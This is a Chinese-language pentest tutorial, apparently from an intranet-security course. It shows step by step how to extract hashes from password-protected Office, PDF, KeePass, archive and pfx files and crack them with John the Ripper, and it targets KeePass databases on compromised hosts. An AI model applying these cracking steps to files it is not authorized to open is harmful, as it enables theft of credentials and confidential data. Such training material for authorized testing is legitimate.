企业内网敏感文件破解:Office/PDF/压缩包/KeePass 爆破实战

爆力破解文档文件

常见的文档文件有office文档，pdf文档等。对于office文档，我们可以使用Johnthe Ripper进行破解，工具下载地址为：https://www.openwall.com/john/。

首先需要将密码信息转换为john支持的hash格式，可以使用office2john.py进行转换，地址为https://github.com/openwall/john/blob/bleeding-jumbo/run/office2john.py：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python office2john.py .\ms08067\ms08067.docx > office.txtC:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python office2john.py .\ms08067\ms08067.xlsx >> office.txtC:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type office.txt ms08067.docx:$office$*2013*100000*256*16*5133eac9d7ed599366d5dee5dbc3ccb6*636ec27b7ab6901f64fb74 5f641b1a5b*5cb5657a8c16cd46b7ee0ce676aff65f02624d15c80d971888f708ab4459fe2b ms08067.xlsx:$office$*2013*100000*256*16*d27f8878236c5a0002037aad390a9196*24277fea5d8a223a35fc9a 596b67b5f6*a8cb1481d36ad38b71dca80aebd829a804b8b2b7651934bf7120e0472b24e9f3 

然后使用john进行破解，可以看到成功爆破出两个文档密码都为ms08067：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john.exe -- wordlist=password.lst office.txtWarning: detected hash type "Office", but the string is also recognized as "office-opencl"          Use the "--format=office-opencl" option to force loading these as that type instead Using default input encoding: UTF-8Loaded 2 password hashes with 2 different salts (Office, 2007/2010/2013 [SHA1 256/256 AVX2 8x /SHA512 256/256 AVX2 4x AES])

Cost 1 (MS Office version) is 2013 for all loaded hashesCost 2 (iteration count) is 100000 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (ms08067.docx)ms08067          (ms08067.xlsx)2g 0:00:00:01 DONE (2021-09-26 22:08) 1.115g/s 142.7p/s 285.5c/s 285.5C/s lacrosse..flipperUse the "--show" option to display all of the cracked passwords reliablySession completed

对于PDF文档，也可以使用john进行破解，流程和破解office文档一样，先转换成john支持的hash格式：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>perl pdf2john.pl .\ms08067\006.pdf > pdf.txt C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type pdf.txt./ms08067/006.pdf:$pdf$4*4*128*-1028*1*16*1730ea102d5e5f4b9c60982b6629230e*32*0ded63df38b8340ff0 bfc12b4807932100000000000000000000000000000000*32*9a670082327ba294b296232851313350661f2892bfb804 72e0f9caea1677f6ed 

然后使用john进行破解：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst pdf.txt          Warning: invalid UTF-8 seen reading pdf.txt          Using default input encoding: UTF-8 Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])Cost 1 (revision) is 4 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (./ms08067/006.pdf)1g 0:00:00:00 DONE (2021-09-26 22:24) 21.27g/s 5446p/s 5446c/s 5446C/s 123456..flipperUse the "--show --format=PDF" options to display all of the cracked passwords reliablySession completed

暴力破解keepass数据库文件

keepass是一款密码管理软件，如果我们在渗透测试过程发现目标主机使用了keepass软件，也可以尝试使用Johnthe Ripper对keepass数据库密码进行暴力破解来访问里面保存的密码信息。

首先将keepass数据库密码信息转换成john支持的hash格式：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1- win64\run>keepass2john.exe .\ms08067\ms08067.kdbx > kdbx.txt C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type kdbx.txt ms08067:$keepass$*2*60000*0*05b9d680013b739917b17bad820193561956d7e98eee40ef1c7c95fd86cf75e1*4b1 85303cbf67555f3753a855e69f59c0944b4fb95fda5e154491b855d7a0da1*97ef796dcf8e24ed26e35b7c00f29efc*4 f9b8cba8f317e8b41bb17ac3372c6fc7287c85914bb9f5a30dc7add8af8407d*ea3f4c70aabff2bb9cfb5125e7b14f77 9663217a80cb6741909f60a4dbe9ac08 

然后使用john进行破解。可以看到成功爆破出密码为ms08067：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst kdbx.txt          Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl" Use the "--format=KeePass-opencl" option to force loading these as that type instead Using default input encoding: UTF-8Loaded 1 password hash (KeePass [SHA256 AES 32/64])Cost 1 (iteration count) is 60000 for all loaded hashesCost 2 (version) is 2 for all loaded hashesCost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (ms08067)1g 0:00:00:01 DONE (2021-09-26 22:27) 0.8210g/s 183.9p/s 183.9c/s 183.9C/s lacrosse..tommyUse the "--show" option to display all of the cracked passwords reliablySession completed

暴力破解压缩文件

常见的压缩文件，如zip，7z，rar等，如果设置了密码，也可以使用Johnthe Ripper进行破解。流程基本都一样，首先将压缩文件密码信息转换成john支持的hash格式，然后使用john.exe进行破解。

zip文件密码破解过程如下：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>zip2john.exe .\ms08067\ms08067.zip > zip.txtver 2.0 ms08067.zip/test.docx PKZIP Encr: cmplen=13349, decmplen=17920, crc=D2B97C0A C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type zip.txtms08067.zip/test.docx:$pkzip2$1*1*2*0*3425*4600*d2b97c0a*0*27*8*3425*d2b9*b6c0*618ffe9014e5802c4647727d8bf7ad62f41edce21a49cdec39939a98c8f798b133a6dd681175b1d1f...省略...9f6d5d748fd2b25f9fd3a4f11*$/pkzip2$:test.docx:ms08067.zip::.\ms08067\ms08067.zipC:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst zip.txtUsing default input encoding: UTF-8          Loaded 1 password hash (PKZIP [32/64]) Will run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (ms08067.zip/test.docx)1g 0:00:00:00 DONE (2021-09-26 22:29) 20.00g/s 70940p/s 70940c/s 70940C/s 123456..sssUse the "--show" option to display all of the cracked passwords reliablySession completed

7z文件密码破解过程如下：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>perl 7z2john.pl .\ms08067\ms08067.7z > 7z.txtC:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type 7z.txt ms08067.7z:$7z$0$19$0$$8$5936cc98cdd54bdc0000000000000000$2638155691$128$128$3de888a246590da5acf 1f052ead3a2a439bc103081e365b5f849aa3ca61316953bfb3313132ff8089393b58ebd35d3be3518712824248d0a56e 08077a5d4e23ea64b9479c1387f4a7e4bf2199d407be5d54a76578556a64074b6334217a63de4f51bfb8cc48c3e8c9ba fb8a813e68d7473ff3ef42e88762e15001a7f47525f77 C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst 7z.txt          Warning: detected hash type "7z", but the string is also recognized as "7z-opencl"          Use the "--format=7z-opencl" option to force loading these as that type instead Using default input encoding: UTF-8Loaded 1 password hash (7z, 7-Zip [SHA256 256/256 AVX2 8x AES])Cost 1 (iteration count) is 524288 for all loaded hashesCost 2 (padding size) is 0 for all loaded hashesCost 3 (compression type) is 0 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (ms08067.7z)1g 0:00:00:02 DONE (2021-09-26 22:31) 0.4397g/s 112.5p/s 112.5c/s 112.5C/s lacrosse..flipperUse the "--show" option to display all of the cracked passwords reliablySession completed

rar文件密码破解过程如下：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>rar2john.exe .\ms08067\ms08067.rar > rar.txtC:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type rar.txt .\ms08067\ms08067.rar:$rar5$16$73402e4e30b84b2a8644e2b12e73fd7d$15$9c4b7cf5791cf67239f2e3b4da531 27c$8$616aafce8c4d7743 C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst rar.txtWarning: detected hash type "RAR5", but the string is also recognized as "RAR5-opencl"          Use the "--format=RAR5-opencl" option to force loading these as that type instead Using default input encoding: UTF-8Loaded 1 password hash (RAR5 [PBKDF2-SHA256 256/256 AVX2 8x])Cost 1 (iteration count) is 32768 for all loaded hashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusms08067          (.\ms08067\ms08067.rar)1g 0:00:00:00 DONE (2021-09-26 22:35) 3.891g/s 996.1p/s 996.1c/s 996.1C/s 123456..flipperUse the "--show" option to display all of the cracked passwords reliablySession completed

暴力破解pfx证书

John the Ripper也支持破解pfx证书文件的密码。同样，先将密码信息转换成hash：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>python pfx2john.py .\ms08067\ms08067.pfx > pfx.txt C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>type pfx.txtms08067.pfx:$pfxng$1$20$2048$8$da005f7d3510770c$308209b03082046706092a864886f70d01070...省略...65f7499b4c0b84182d592f2$0f0a94e6edf446bfdc8266563ba010ebd9b33cc9:::::.\ms08067\ms08067.pfx

然后使用john.exe进行破解：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>john -- wordlist=password.lst pfx.txtWarning: detected hash type "pfx", but the string is also recognized as "pfx-opencl"          Use the "--format=pfx-opencl" option to force loading these as that type instead Using default input encoding: UTF-8Loaded 1 password hash (pfx [PKCS12 PBE (.pfx, .p12) (SHA-1 to SHA-512) 256/256 AVX2 8x])Cost 1 (iteration count) is 2048 for all loaded hashesCost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loadedhashesWill run 8 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statuspassword         (ms08067.pfx)1g 0:00:00:00 DONE (2021-09-26 22:36) 12.34g/s 25283p/s 25283c/s 25283C/s 123456..myloveUse the "--show" option to display all of the cracked passwords reliablySession completed

破解完成后，我们可以使用certutil进行验证。密码正确时，可以看到证书的详细信息：

C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>certutil - dump .\ms08067\ms08067.pfx          Enter PFX password:（错误密码）          Cannot decode object: The specified network password is not correct. 0x80070056 (WIN32: 86 ERROR_INVALID_PASSWORD) CertUtil: -dump command FAILED: 0x80070056 (WIN32: 86 ERROR_INVALID_PASSWORD)CertUtil: The specified network password is not correct.C:\Users\test\Desktop\ms08067\内网安全2.0\12Brute-force\john-1.9.0-jumbo-1-win64\run>certutil - dump .\ms08067\ms08067.pfx          Enter PFX password:（正确密码）================ Certificate 0 ================ ================ Begin Nesting Level 1 ================Element 0:Serial Number: 3285e458285080fbb584ca986fc3000bcf5ff652Issuer: E=root@ms08067.cn, OU=ms08067, O=ms08067, L=shanghai, S=SH, C=CN NotBefore: 2021/8/22 22:27 NotAfter: 2031/8/20 22:27Subject: E=root@ms08067.cn, OU=ms08067, O=ms08067, L=shanghai, S=SH, C=CNSignature matches Public KeyRoot Certificate: Subject matches IssuerCert Hash(sha1): 7c518c92c2126bec265f7499b4c0b84182d592f2----------------  End Nesting Level 1  ----------------  Provider = Microsoft Enhanced Cryptographic Provider v1.0Encryption test passedCertUtil: -dump command completed successfully.